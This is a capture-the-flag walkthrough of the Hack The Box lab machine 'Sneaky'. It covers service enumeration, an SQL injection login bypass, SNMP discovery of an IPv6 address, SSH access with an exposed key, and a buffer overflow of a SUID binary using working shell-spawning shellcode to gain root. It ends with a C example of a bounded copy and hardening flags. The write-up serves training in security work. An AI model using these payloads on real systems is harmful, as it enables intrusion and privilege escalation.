Today we are going to solve another CTF challenge, "Sneaky", which is available online for those who want to improve their penetration testing and black-box testing skills. Sneaky is a retired vulnerable lab from Hack The Box, which offers online penetration-testing practice according to your experience level; its collection of vulnerable labs ranges from beginner to expert.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Let's begin with nmap port enumeration.
root@kali:~/htb/sneaky# nmap -sT -sU -p 161,80 10.10.10.20
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 10:56 CET
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.10.20
Host is up (0.026s latency).
PORT    STATE  SERVICE
80/tcp  open   http
161/tcp closed snmp
80/udp  closed http
161/udp open   snmp
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds
Since port 80 is running HTTP, we open it in our browser; the website shows that it is under construction.
We initiate dirb to enumerate the directories hosted on the target machine.
root@kali:~/htb/sneaky# dirb http://10.10.10.20/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Dec 24 11:37:09 2018
URL_BASE: http://10.10.10.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.20/ ----
==> DIRECTORY: http://10.10.10.20/dev/
We find a directory called /dev/; opening it in our browser shows a login screen.
The login page is vulnerable to SQL injection: entering the tautology ' or 1=1;-- as both username and password bypasses the authentication check.
After logging in we find a link on the webpage.
We open the link and find an RSA private key, which we download to our system.
http://10.10.10.20/dev/sshkeyforadministratordifficulttimes
The target machine does not appear to be running an SSH service on its IPv4 address, so we cannot yet use this key to log in through SSH.
To investigate further, we enumerate the SNMP service (UDP 161, open according to nmap) to gain more information.
root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20
iso.3.6.1.2.1.1.1.0 = STRING: "Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (3570073) 9:55:00.73
iso.3.6.1.2.1.1.4.0 = STRING: "root"
iso.3.6.1.2.1.1.5.0 = STRING: "Sneaky"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
root@kali:~/htb/sneaky# python enyx.py 2c public 10.10.10.20
#######################################################################
[+] Snmpwalk found.
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:fe8f:6bf0
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:fe8f:6bf0
or
root@kali:~/htb/sneaky# apt install snmp-mibs-downloader
root@kali:~/htb/sneaky# vi /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :
root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20 > snmpwalk.txt
root@kali:~/htb/sneaky# cat snmpwalk.txt | grep ipv6
IP-MIB::ipAddressPrefix.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:8f:6b:f0" = OID: IP-MIB::ipAddressPrefixOrigin.2.ipv6."de:ad:be:ef:00:00:00:00:00:00:00:00:00:00:00:00".64
Having found the IPv6 address of the target machine, we log in through SSH over IPv6 using the username and the RSA private key we found after logging in on the /dev/ page.
root@kali:~/htb/sneaky# ssh -i priv -6 thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:6bf0
The authenticity of host 'dead:beef::250:56ff:fe8f:6bf0 (dead:beef::250:56ff:fe8f:6bf0)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'dead:beef::250:56ff:fe8f:6bf0' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)
 * Documentation: https://help.ubuntu.com/
System information as of Mon Dec 24 04:46:18 EET 2018
  System load: 0.0              Memory usage: 4%   Processes: 177
  Usage of /: 9.9% of 18.58GB   Swap usage: 0%     Users logged in: 0
Graph this data and manage this system at: https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$ ls
After logging in through SSH we find a file called user.txt; opening it gives us the first flag. Next we look for files with the SUID bit set.
thrasivoulos@Sneaky:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/usr/local/bin/chal
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/at
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
thrasivoulos@Sneaky:~$
thrasivoulos@Sneaky:~$ base64 /usr/local/bin/chal > /tmp/chall.b64
root@kali:~/htb/sneaky# base64 -d chall.b64
ELF 4T4 --snip-- art____dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_EN
root@kali:~/htb/sneaky# ./checksec.sh --file chall
RELRO           STACK CANARY      NX            PIE      RPATH      RUNPATH   FILE
Partial RELRO   No canary found   NX disabled   No PIE   No RPATH   No RUN
None of the protections are enabled (no stack canary, NX disabled, no PIE), so this is going to be a straightforward vanilla Linux stack buffer overflow. Now let's start fuzzing.
root@kali:~/htb/sneaky# ./chall AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAaaaaaaaaaaaaaaaaaa
Segmentation fault
We got a segmentation fault. Now we run the binary in gdb with a cyclic pattern as the argument, so the crash address tells us which part of the input overwrites the return address.
Let's create our pattern using https://github.com/ickerwx/pattern
root@kali:~/htb/sneaky# python pattern_create.py 1000
-------------------------------------------------------------------------
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
-------------------------------------------------------------------------
Length: 1000
[+] SetA: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
[+] SetB: 'abcdefghijklmnopqrstuvwxyz'
[+] SetC: '0123456789'
-------------------------------------------------------------------------
root@kali:~/htb/sneaky#
Now we run it in GDB with the pattern as the argument:
root@kali:~/htb/sneaky# gdb chall
GNU gdb (Debian 8.1-4+b1) 8.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from chall...(no debugging symbols found)...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /root/htb/sneaky/chall Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac--snip-- g9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault.
0x316d4130 in ?? ()
(gdb)
We get a segmentation fault at address 0x316d4130, which is four bytes of our pattern interpreted as the return address. Now we check where these four characters occur in the pattern:
root@kali:~/htb/sneaky# python pattern.py offset 0x316d4130
362
So the offset is 362, meaning the four bytes following the first 362 bytes of input overwrite the saved EIP. Next we need a shellcode: http://shell-storm.org/shellcode/files/shellcode-827.php
- After enumerating the executable, we know it is a 32-bit ELF binary that uses strcpy().
- strcpy() copies without any bounds check, so it is vulnerable to a stack buffer overflow.
- After running it under gdb and working out the stack layout, the following command successfully spawns a shell as root (the binary is SUID root).
- The shellcode used is:
thrasivoulos@Sneaky:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# whoami
root
# cd /
# cd root
# cat root.txt
c515*****b33
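As an added illustration (not the source of the chal binary, which the page does not show), the following C program contrasts the unchecked strcpy() pattern that makes chal exploitable with a bounded copy that rejects over-long arguments; the buffer size of 64 bytes is an assumption.

```c
#include <stdio.h>
#include <string.h>
/* Assumed destination size; the page does not show chal's real buffer size. */
#define BUF_SIZE 64

/* Vulnerable pattern: strcpy() copies until the NUL terminator with no bounds
 * check, so an argument longer than the buffer overwrites the saved frame
 * pointer and return address, exactly the overflow described above. */
int vulnerable_copy(const char *arg)
{
    char buf[BUF_SIZE];
    strcpy(buf, arg);                 /* no length check */
    return (int)strlen(buf);
}

/* Hardened form: locate the terminator within the buffer's capacity before
 * copying, and reject input that does not fit rather than truncating it.
 * Returns the copied length, or -1 when the argument is rejected. */
int bounded_copy(const char *arg)
{
    char buf[BUF_SIZE];
    const char *end = memchr(arg, '\0', BUF_SIZE);
    if (end == NULL)
        return -1;                    /* no NUL in the first BUF_SIZE bytes */
    size_t n = (size_t)(end - arg);   /* n <= BUF_SIZE - 1, room for the NUL */
    memcpy(buf, arg, n + 1);
    return (int)n;
}

/* Helper: feed bounded_copy() an argument of `len` 'A' bytes. */
int try_length(size_t len)
{
    char tmp[1024];
    if (len >= sizeof tmp)
        return -2;
    memset(tmp, 'A', len);
    tmp[len] = '\0';
    return bounded_copy(tmp);
}

int main(int argc, char **argv)
{
    if (argc != 2 || bounded_copy(argv[1]) < 0) {
        fprintf(stderr, "usage: %s <string of at most %d bytes>\n", argv[0], BUF_SIZE - 1);
        return 1;
    }
    puts("copied safely");
    return 0;
}
```

Building with -fstack-protector-strong, -Wl,-z,noexecstack and -fPIE -pie would also add the canary, NX and PIE that checksec reported missing on chal, so that an overflow like this one crashes instead of yielding a root shell.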
Author: Jacco Straathof